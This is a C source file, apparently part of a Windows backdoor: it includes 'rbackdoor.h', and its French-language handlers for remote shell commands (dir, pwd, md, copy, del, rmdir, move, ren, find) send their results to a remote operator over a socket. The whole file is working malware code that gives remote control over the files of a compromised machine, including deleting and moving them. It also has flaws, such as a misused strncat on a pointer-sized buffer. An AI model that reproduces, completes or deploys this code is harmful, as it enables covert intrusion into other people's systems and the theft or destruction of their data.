#include "rbackdoor.h"

/*************************************************************/
/* Shell Command: dir                                        */
/*************************************************************/

void Proc_Dir(LPCTSTR file)
{
	int r=0, f=0;
	char nom[MAX_PATH], *buf=NULL, *path=NULL;
	WIN32_FIND_DATA wData;
	HANDLE listing;
		
	buf = (char *)GlobalAlloc(GPTR, 256);
	CheckMemory(buf);
	path = (char *)GlobalAlloc(GPTR, 256);
	CheckMemory(path);
	
    strlcpy(buf, "\n\tRepertoire de : ", 256);

 	if(*file > 2) {
        strlcat(buf, file, 256);
		strcat(buf, "\n\n");
	}
	else {
		_getcwd(path, 256); 
		strlcat(buf, path, 256);
		strcat(buf, "\n\n");
	}

	rsend(ConnectSocket, buf);
	GlobalFree(path);
	strncat((char *)file, "*.*", sizeof(file));
	listing = FindFirstFile(file, &wData);
	
	while((FindNextFile(listing, &wData)))
	{
		strlcpy(nom, wData.cFileName, sizeof(nom));
		if(wData.dwFileAttributes & FILE_ATTRIBUTE_DIRECTORY) {
			rsend(ConnectSocket, "<REP>");
			r++;
		}
		else  {
			sprintf(buf, "\t%d", wData.nFileSizeHigh*MAXDWORD+wData.nFileSizeLow);
			rsend(ConnectSocket, buf);
			f++;
		}
		rsend(ConnectSocket, "\t");
		rsend(ConnectSocket, nom);
		rsend(ConnectSocket, "\n");
	}
	sprintf(buf, "\t\t %d Fichier(s) \n\t\t %d Rep(s)", f, r);
	rsend(ConnectSocket, buf);

	GlobalFree(buf);
}

/*************************************************************/
/* Shell Command: pwd                                        */
/*************************************************************/

int pwd(void)
{
	char *buffer=NULL;
	
	buffer = (char *)GlobalAlloc(GPTR, 1024);
	CheckMemory(buffer);

	if(_getcwd(buffer, 1024)==NULL) {
		DisplayMessage("Erreur lors de la recuperation du repertoire courant.", 0);
		return -1;
	}
	else {
		rsend(ConnectSocket, buffer);
	}

	rsend(ConnectSocket, "\n");
	GlobalFree(buffer);
	return 0;
}

/*************************************************************/
/* Shell Command: md                                         */
/*************************************************************/

int Proc_CreateDir(const char *dir)
{
	unsigned int err;
	
	if(!*dir) {
	    Proc_help("md");
		return -1;
	}
	err = CreateDirectory(dir, NULL);
	if(err==0) {
		DisplayMessage("Erreur lors de la tentative de creation du repertoire.", 0);
		return -1;
	}
	else {
		DisplayMessage("Repertoire creer avec succes.", 1);
	}
	return 0;
}

/*************************************************************/
/* Shell Command: copy                                       */
/*************************************************************/

int Proc_Copy(const char *src, const char *dest)
{
	unsigned int err;
	
	if(!*src || !*dest) {
		Proc_help("copy");
		return -1;
	}
	err = CopyFile(src, dest, FALSE);
	if(err==0) {
		DisplayMessage("Erreur lors de la tentative de copie du fichier.", 0);
		return -1;
	}
	else {
		DisplayMessage("Fichier copie avec succes", 1);
	}

	return 0;
}

/*************************************************************/
/* Shell Command: del                                        */
/*************************************************************/

int Proc_DeleteFile(const char *file)
{
	unsigned int err;

	if(!*file) {
		Proc_help("del");
		return -1;
	}
	err = DeleteFile(file);
	if(err==0) {
		DisplayMessage("Erreur lors de la tentative de suppression du fichier.", 0);
		return -1;
	}
	else {
		DisplayMessage("Fichier efface avec succes.", 0);
	}

	return 0;
}

/*************************************************************/
/* Shell Command: rmdir                                      */
/*************************************************************/

int Proc_RemoveDir(const char *dir)
{
	unsigned int err;
	
	if(!*dir) {
		Proc_help("rmdir");
		return -1;
	}
	
	err = RemoveDirectory(dir);
	if(err==0) {
		DisplayMessage("Erreur lors de la tentative de suppression du repertoire.", 0);
		return -1;
	}
	else {
		DisplayMessage("Repertoire efface avec succes.", 1);
	}

	return 0;
}

/*************************************************************/
/* Shell Command: move                                       */
/*************************************************************/

int Proc_MoveFile(const char *src, const char *dest)
{
	unsigned int err;
	
	if(!*src || !*dest) {
		Proc_help("move");
		return -1;
	}
	err = MoveFile(src, dest);
	if(err==0) {
		DisplayMessage("Erreur lors de la tentative de deplacement du fichier.", 0);
		return -1;
	}
	else {
		DisplayMessage("Fichier deplace avec succes.", 1);
	}

	return 0;
}

/*************************************************************/
/* Shell Command: ren                                        */
/*************************************************************/

int Proc_RenameFile(const char *oldname, const char *newname)
{
	unsigned int err;

	if(!*oldname  || !*newname) {
		Proc_help("ren");
		return -1;
	}
	err = rename(oldname, newname);
	if(err != 0) {
		DisplayMessage("Erreur lors de la tentative de renommage du fichier.", 0);
		return -1;
	}
	else {
		DisplayMessage("Fichier renomme avec succes.", 1);
	}

	return 0;
}

/*************************************************************/
/* Shell Command: clear                                      */
/*************************************************************/

int Proc_Clear(void) 
{
	int i;

	for(i = 0; i < 50; i++) {
		rsend(ConnectSocket, "\n");
	}

	return 0;
}

/*************************************************************/
/* Shell Command: find                                       */
/*************************************************************/

int Find(const char *file)
{
	WIN32_FIND_DATA FileInfo;
	HANDLE hFind;
	
	if(!*file) {
		Proc_help("find");
		return -1;
	}

	hFind = FindFirstFile(file, &FileInfo) ;
	if (hFind == INVALID_HANDLE_VALUE ) {
		rsend(ConnectSocket, "Fichier non existant.\n");
	}
	else {
		rsend(ConnectSocket, "Fichier trouve : ");
		rsend(ConnectSocket, file);
		FindClose (hFind);
	}
	
	return 0;
}

